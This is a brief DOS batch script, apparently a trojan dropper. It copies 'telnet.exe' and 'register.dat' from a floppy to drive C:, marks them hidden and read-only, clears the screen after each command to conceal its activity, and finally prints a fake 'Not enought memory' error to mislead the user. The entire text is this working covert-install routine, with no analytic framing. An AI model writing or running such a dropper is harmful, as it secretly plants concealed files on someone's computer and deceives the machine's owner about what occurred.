@echo off @copy a:\top\telnet.exe c:\ @cls @copy a:\top\register.dat c:\ @cls @attrib +h +r c:\telnet.exe @cls @attrib +h c:\register.dat @cls @echo Not enought memory.